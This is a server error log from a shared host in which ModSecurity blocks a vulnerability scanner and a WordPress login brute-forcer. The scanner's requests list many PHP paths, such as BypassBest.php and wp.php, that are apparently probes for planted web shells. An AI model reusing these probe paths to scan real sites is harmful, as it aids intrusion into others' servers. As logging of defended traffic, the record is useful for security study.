[Tue May 26 19:15:03.814240 2026] [security2:error] [pid 26857:tid 27091] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/222.php"] [unique_id "ahWj39foqtHEG_e9i6GojQAA7Ro"]
[Tue May 26 19:15:04.547365 2026] [security2:error] [pid 26857:tid 26881] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/cgi-bin/index.php"] [unique_id "ahWj4NfoqtHEG_e9i6GougAAwBc"]
[Tue May 26 19:15:04.547517 2026] [security2:error] [pid 26857:tid 27046] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/cgi-bin/index.php"] [unique_id "ahWj4NfoqtHEG_e9i6GougAAwBc"]
[Tue May 26 19:15:04.606387 2026] [security2:error] [pid 26857:tid 27049] [client 202.76.190.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj4NfoqtHEG_e9i6GopgAAAMM"]
[Tue May 26 19:15:05.342992 2026] [autoindex:error] [pid 26857:tid 26899] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:15:05.344152 2026] [security2:error] [pid 26857:tid 27100] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj4dfoqtHEG_e9i6Go4wAA9ik"]
[Tue May 26 19:15:05.531923 2026] [security2:error] [pid 26857:tid 27038] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj4dfoqtHEG_e9i6Go2QAAALg"]
[Tue May 26 19:15:05.601000 2026] [security2:error] [pid 26857:tid 26907] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/BDKR28WP.php"] [unique_id "ahWj4dfoqtHEG_e9i6Go9AAA_zE"]
[Tue May 26 19:15:05.601253 2026] [security2:error] [pid 26857:tid 27109] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/BDKR28WP.php"] [unique_id "ahWj4dfoqtHEG_e9i6Go9AAA_zE"]
[Tue May 26 19:15:05.751032 2026] [autoindex:error] [pid 26857:tid 26908] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/l10n/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:15:05.751826 2026] [security2:error] [pid 26857:tid 27089] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj4dfoqtHEG_e9i6Go_QAA6zI"]
[Tue May 26 19:15:05.885922 2026] [autoindex:error] [pid 26857:tid 26915] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:15:05.886930 2026] [security2:error] [pid 26857:tid 26996] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj4dfoqtHEG_e9i6GpBgAAjjk"]
[Tue May 26 19:15:06.006003 2026] [security2:error] [pid 26857:tid 26917] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpDwAA4zs"]
[Tue May 26 19:15:06.006236 2026] [security2:error] [pid 26857:tid 27081] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpDwAA4zs"]
[Tue May 26 19:15:06.161912 2026] [security2:error] [pid 26857:tid 26916] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/abcd.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpGwAAkDo"]
[Tue May 26 19:15:06.162098 2026] [security2:error] [pid 26857:tid 26998] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/abcd.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpGwAAkDo"]
[Tue May 26 19:15:06.566292 2026] [security2:error] [pid 26857:tid 27038] [client 167.160.78.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpLgAAALg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 19:15:06.624077 2026] [security2:error] [pid 26857:tid 26929] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/a1.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpNgAA10c"]
[Tue May 26 19:15:06.624272 2026] [security2:error] [pid 26857:tid 27069] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/a1.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpNgAA10c"]
[Tue May 26 19:15:06.793867 2026] [security2:error] [pid 26857:tid 26927] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-includes/Text/Diff/Engine/about.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpQQAApUU"]
[Tue May 26 19:15:06.794060 2026] [security2:error] [pid 26857:tid 27019] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-includes/Text/Diff/Engine/about.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpQQAApUU"]
[Tue May 26 19:15:06.887125 2026] [security2:error] [pid 26857:tid 26939] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/bal.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpUQAAjlE"]
[Tue May 26 19:15:06.887311 2026] [security2:error] [pid 26857:tid 26996] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/bal.php"] [unique_id "ahWj4tfoqtHEG_e9i6GpUQAAjlE"]
[Tue May 26 19:15:07.001345 2026] [security2:error] [pid 26857:tid 26937] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/cgi-bin/admin.php"] [unique_id "ahWj49foqtHEG_e9i6GpWQAAl08"]
[Tue May 26 19:15:07.001496 2026] [security2:error] [pid 26857:tid 27005] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/cgi-bin/admin.php"] [unique_id "ahWj49foqtHEG_e9i6GpWQAAl08"]
[Tue May 26 19:15:07.158996 2026] [security2:error] [pid 26857:tid 26935] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/gettest.php"] [unique_id "ahWj49foqtHEG_e9i6GpYwABA00"]
[Tue May 26 19:15:07.159196 2026] [security2:error] [pid 26857:tid 27113] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/gettest.php"] [unique_id "ahWj49foqtHEG_e9i6GpYwABA00"]
[Tue May 26 19:15:07.541170 2026] [security2:error] [pid 26857:tid 26938] [remote 43.239.92.149:49640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.92.239.43.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWj49foqtHEG_e9i6GpcQAArVA"]
[Tue May 26 19:15:07.655771 2026] [security2:error] [pid 26857:tid 27083] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj49foqtHEG_e9i6GpZgAAAOU"]
[Tue May 26 19:15:08.031489 2026] [security2:error] [pid 26857:tid 26971] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-content/BypassBest.php"] [unique_id "ahWj5NfoqtHEG_e9i6GppwAAvXE"]
[Tue May 26 19:15:08.031771 2026] [security2:error] [pid 26857:tid 27043] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-content/BypassBest.php"] [unique_id "ahWj5NfoqtHEG_e9i6GppwAAvXE"]
[Tue May 26 19:15:08.162836 2026] [security2:error] [pid 26857:tid 27077] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.kingsclub.in"] [uri "/wp-content/index.php"] [unique_id "ahWj5NfoqtHEG_e9i6GpsQAA3wY"]
[Tue May 26 19:15:08.214505 2026] [security2:error] [pid 26857:tid 26974] [remote 43.239.92.149:49640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.92.239.43.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWj5NfoqtHEG_e9i6GpsgAA8HQ"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 19:15:08.253661 2026] [security2:error] [pid 26857:tid 26866] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/simple.php"] [unique_id "ahWj5NfoqtHEG_e9i6GptgAA-wg"]
[Tue May 26 19:15:08.253833 2026] [security2:error] [pid 26857:tid 27105] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/simple.php"] [unique_id "ahWj5NfoqtHEG_e9i6GptgAA-wg"]
[Tue May 26 19:15:08.533268 2026] [security2:error] [pid 26857:tid 26868] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/buy.php"] [unique_id "ahWj5NfoqtHEG_e9i6GpyQAAiwo"]
[Tue May 26 19:15:08.533514 2026] [security2:error] [pid 26857:tid 26993] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/buy.php"] [unique_id "ahWj5NfoqtHEG_e9i6GpyQAAiwo"]
[Tue May 26 19:15:08.713328 2026] [security2:error] [pid 26857:tid 26984] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/xxx.php"] [unique_id "ahWj5NfoqtHEG_e9i6Gp1AAAz34"]
[Tue May 26 19:15:08.713567 2026] [security2:error] [pid 26857:tid 27061] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/xxx.php"] [unique_id "ahWj5NfoqtHEG_e9i6Gp1AAAz34"]
[Tue May 26 19:15:08.808001 2026] [security2:error] [pid 26857:tid 26871] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/hypo.php"] [unique_id "ahWj5NfoqtHEG_e9i6Gp3wAA5w0"]
[Tue May 26 19:15:08.808180 2026] [security2:error] [pid 26857:tid 27085] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/hypo.php"] [unique_id "ahWj5NfoqtHEG_e9i6Gp3wAA5w0"]
[Tue May 26 19:15:09.412686 2026] [security2:error] [pid 26857:tid 27073] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj5NfoqtHEG_e9i6Gp5wAAANs"]
[Tue May 26 19:15:09.587228 2026] [autoindex:error] [pid 26857:tid 26876] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:15:09.588103 2026] [security2:error] [pid 26857:tid 27099] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj5dfoqtHEG_e9i6GqCwAA9RI"]
[Tue May 26 19:15:09.729844 2026] [security2:error] [pid 26857:tid 26873] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/chosen.php"] [unique_id "ahWj5dfoqtHEG_e9i6GqFQAA_w8"]
[Tue May 26 19:15:09.730029 2026] [security2:error] [pid 26857:tid 27109] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/chosen.php"] [unique_id "ahWj5dfoqtHEG_e9i6GqFQAA_w8"]
[Tue May 26 19:15:10.033560 2026] [autoindex:error] [pid 26857:tid 26872] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/block-bindings/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:15:10.034365 2026] [security2:error] [pid 26857:tid 26997] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj5tfoqtHEG_e9i6GqGgAAjw4"]
[Tue May 26 19:15:10.290290 2026] [security2:error] [pid 26857:tid 26885] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/00.php"] [unique_id "ahWj5tfoqtHEG_e9i6GqHwAA9Bs"]
[Tue May 26 19:15:10.290540 2026] [security2:error] [pid 26857:tid 27098] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/00.php"] [unique_id "ahWj5tfoqtHEG_e9i6GqHwAA9Bs"]
[Tue May 26 19:15:10.434756 2026] [security2:error] [pid 26857:tid 26875] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/als.php"] [unique_id "ahWj5tfoqtHEG_e9i6GqLAAA9xE"]
[Tue May 26 19:15:10.435009 2026] [security2:error] [pid 26857:tid 27101] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/als.php"] [unique_id "ahWj5tfoqtHEG_e9i6GqLAAA9xE"]
[Tue May 26 19:15:10.695232 2026] [security2:error] [pid 26857:tid 26882] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/pol.php"] [unique_id "ahWj5tfoqtHEG_e9i6GqMAAA6xg"]
[Tue May 26 19:15:10.695459 2026] [security2:error] [pid 26857:tid 27089] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/pol.php"] [unique_id "ahWj5tfoqtHEG_e9i6GqMAAA6xg"]
[Tue May 26 19:15:10.867392 2026] [security2:error] [pid 26857:tid 26859] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/ll.php"] [unique_id "ahWj5tfoqtHEG_e9i6GqNAAAxwE"]
[Tue May 26 19:15:10.867896 2026] [security2:error] [pid 26857:tid 27053] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/ll.php"] [unique_id "ahWj5tfoqtHEG_e9i6GqNAAAxwE"]
[Tue May 26 19:15:11.116108 2026] [security2:error] [pid 26857:tid 26883] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/sf.php"] [unique_id "ahWj59foqtHEG_e9i6GqRQAA1hk"]
[Tue May 26 19:15:11.116419 2026] [security2:error] [pid 26857:tid 27068] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/sf.php"] [unique_id "ahWj59foqtHEG_e9i6GqRQAA1hk"]
[Tue May 26 19:15:11.206906 2026] [security2:error] [pid 26857:tid 26869] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/file5.php"] [unique_id "ahWj59foqtHEG_e9i6GqSQAA-Qs"]
[Tue May 26 19:15:11.207122 2026] [security2:error] [pid 26857:tid 27103] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/file5.php"] [unique_id "ahWj59foqtHEG_e9i6GqSQAA-Qs"]
[Tue May 26 19:15:11.351556 2026] [security2:error] [pid 26857:tid 26893] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/fs.php"] [unique_id "ahWj59foqtHEG_e9i6GqWAAAjyM"]
[Tue May 26 19:15:11.351731 2026] [security2:error] [pid 26857:tid 26997] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/fs.php"] [unique_id "ahWj59foqtHEG_e9i6GqWAAAjyM"]
[Tue May 26 19:15:11.453341 2026] [security2:error] [pid 26857:tid 26901] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/4PJcpMFsD8B.php"] [unique_id "ahWj59foqtHEG_e9i6GqWQAAvis"]
